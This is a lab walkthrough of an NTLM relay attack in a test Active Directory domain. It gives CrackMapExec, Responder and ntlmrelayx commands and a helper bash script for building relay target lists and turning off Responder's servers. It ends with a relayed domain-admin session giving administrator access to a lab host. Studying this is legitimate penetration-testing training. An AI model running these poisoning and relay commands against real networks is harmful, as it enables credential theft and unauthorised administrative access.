NTLM relay
Unsigned SMB
Let’s start hunting unsigned smb in the lab and generate a list of IP targets.
https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0
SMB signing is the integrity mechanism of the SMB protocol. When signing is enabled, every SMB message carries a signature in its header: a message authentication code computed over the message with a session key derived from the authentication (HMAC-SHA256 for SMB 2.x, AES-CMAC for SMB 3.x, with AES-GMAC negotiable on SMB 3.1.1). The recipient recomputes the code and compares it with the header; if they differ, the message was tampered with or did not come from the party that authenticated, and it is discarded. A relay attacker only forwards the authentication and never learns the session key, so it cannot produce valid signatures and a relayed session to a host that requires signing is useless. What matters for relaying is whether signing is required, not merely supported: the signing:False reported by cme below means the host accepts unsigned sessions.
cme smb 192.168.56.10-23 --gen-relay-list smb_targets.txt
This writes to smb_targets.txt the hosts that reported signing:False (signing not required). We can now try to relay NTLM authentication to them.
responder + ntlmrelayx to smb
Before starting Responder to poison the answers to LLMNR, mDNS and NBT-NS requests, we must turn off Responder's own SMB and HTTP servers: we do not want Responder to capture the hashes itself, we want the incoming authentication forwarded to ntlmrelayx, which listens on those ports instead.
sed -i 's/HTTP = On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='
sed -i 's/SMB = On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='
Next, we start ntlmrelayx (with no protocol prefix in the target list, targets are relayed over SMB):
ntlmrelayx -tf smb_targets.txt -of netntlm -smb2support -socks
-tf : file listing the targets to relay the authentication to (the list generated above)
-of : output file prefix; the captured Net-NTLM hashes are also saved, as with Responder, so they can be cracked later
-smb2support : accept SMB2 from the victim clients as well as SMB1
-socks : start a SOCKS proxy that keeps the relayed sessions open so they can be used afterwards from other tools
ntlmrelayx exits with this error:
Type help for list of commands
self._target(*self._args, **self._kwargs)
File "/usr/local/lib/python3.10/dist-packages/impacket/examples/ntlmrelayx/servers/socksserver.py", line 247, in webService
from flask import Flask, jsonify
File "/usr/local/lib/python3.10/dist-packages/flask/__init__.py", line 19, in <module>
from jinja2 import Markup, escape
ImportError: cannot import name 'Markup' from 'jinja2' (/usr/local/lib/python3.10/dist-packages/jinja2/__init__.py)
The cause is an old Flask release that imports Markup from Jinja2, which Jinja2 3.1 removed. Upgrading both packages fixes it:
pip3 install Flask Jinja2 --upgrade
Relaunch ntlmrelayx; this time it starts fine:
ntlmrelayx -tf smb_targets.txt -of netntlm -smb2support -socks
Start Responder on the lab interface to poison name resolution, so the victims end up authenticating to the relay server:
responder -I vboxnet0
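The preparation steps above (building the relay target list, switching off Responder's SMB and HTTP servers and checking that it really happened) as a small set of shell functions with a self-check on constructed data. This is an added example, not part of the original lab notes: the sample cme output, the sample Responder.conf excerpt, the temporary paths and the host names are all assumptions, trimmed from what the real tools print.

```bash
#!/usr/bin/env bash
# Added example (not from the original lab notes): NTLM relay preparation steps
# as reusable functions, run here on constructed sample data.

# Build the relay target list from saved CrackMapExec "smb" output: keep only the
# hosts that report signing:False and print one IP per line. This is the same
# selection --gen-relay-list makes, applied to a scan you already saved.
relay_targets_from_cme() {
    # $1: file containing cme smb output
    grep -F 'signing:False' "$1" | awk '{print $2}' | sort -u
}

# Return 0 only when Responder's SMB and HTTP servers are both Off.
# Responder.conf is INI-style with exact lines "SMB = On" / "HTTP = On".
responder_servers_off() {
    # $1: path to Responder.conf
    grep -qx 'SMB = Off' "$1" && grep -qx 'HTTP = Off' "$1"
}

# Switch Responder's own SMB and HTTP servers off (in place) so the poisoned
# connections reach ntlmrelayx instead of being captured by Responder, then
# verify the result rather than trusting sed silently.
disable_responder_servers() {
    # $1: path to Responder.conf (modified in place)
    sed -i -e 's/^SMB = On$/SMB = Off/' -e 's/^HTTP = On$/HTTP = Off/' "$1"
    responder_servers_off "$1"
}

# --- Constructed sample data (assumption, not real tool output) ---------------
# The DC line with signing:True is invented; the two signing:False hosts use the
# addresses from the lab. Real cme output carries more columns.
SAMPLE_CME_OUTPUT='SMB         192.168.56.10   445    DC            [*] Windows Server 2019 (name:DC) (domain:newyork.local) (signing:True) (SMBv1:False)
SMB         192.168.56.22   445    YONKERS       [*] Windows Server 2019 (name:YONKERS) (domain:north.newyork.local) (signing:False) (SMBv1:False)
SMB         192.168.56.23   445    MARYLAND      [*] Windows 10 (name:MARYLAND) (domain:maryland.local) (signing:False) (SMBv1:False)'

# Excerpt in the shape of the real [Responder Core] section (constructed).
SAMPLE_RESPONDER_CONF='[Responder Core]
; Servers to start
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On'

main() {
    workdir=$(mktemp -d)
    printf '%s\n' "$SAMPLE_CME_OUTPUT" > "$workdir/cme_smb.txt"
    printf '%s\n' "$SAMPLE_RESPONDER_CONF" > "$workdir/Responder.conf"

    relay_targets_from_cme "$workdir/cme_smb.txt" > "$workdir/smb_targets.txt"
    echo "relay targets (signing:False):"
    cat "$workdir/smb_targets.txt"

    if disable_responder_servers "$workdir/Responder.conf"; then
        echo "Responder SMB/HTTP servers disabled in $workdir/Responder.conf"
    else
        echo "failed to disable Responder servers, do not start Responder" >&2
        return 1
    fi

    # What to run next; the interface name is the lab's, adjust to yours.
    echo "ntlmrelayx -tf $workdir/smb_targets.txt -of netntlm -smb2support -socks"
    echo "responder -I vboxnet0"
}

main "$@"
```

The guard matters in practice: if Responder's SMB server is still on, it races ntlmrelayx for port 445 and you capture hashes instead of relaying them, which is exactly the failure the page's sed lines exist to prevent.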
The poisoned connections are relayed to Yonkers (192.168.56.22) and maryland.local (192.168.56.23), and a SOCKS proxy is set up to use the relayed sessions.
Because fernando.alonzo is a domain administrator of north.newyork.local, he has administrator privileges on Yonkers.
We can therefore use this relayed session, through the SOCKS proxy, to access that computer as an administrator.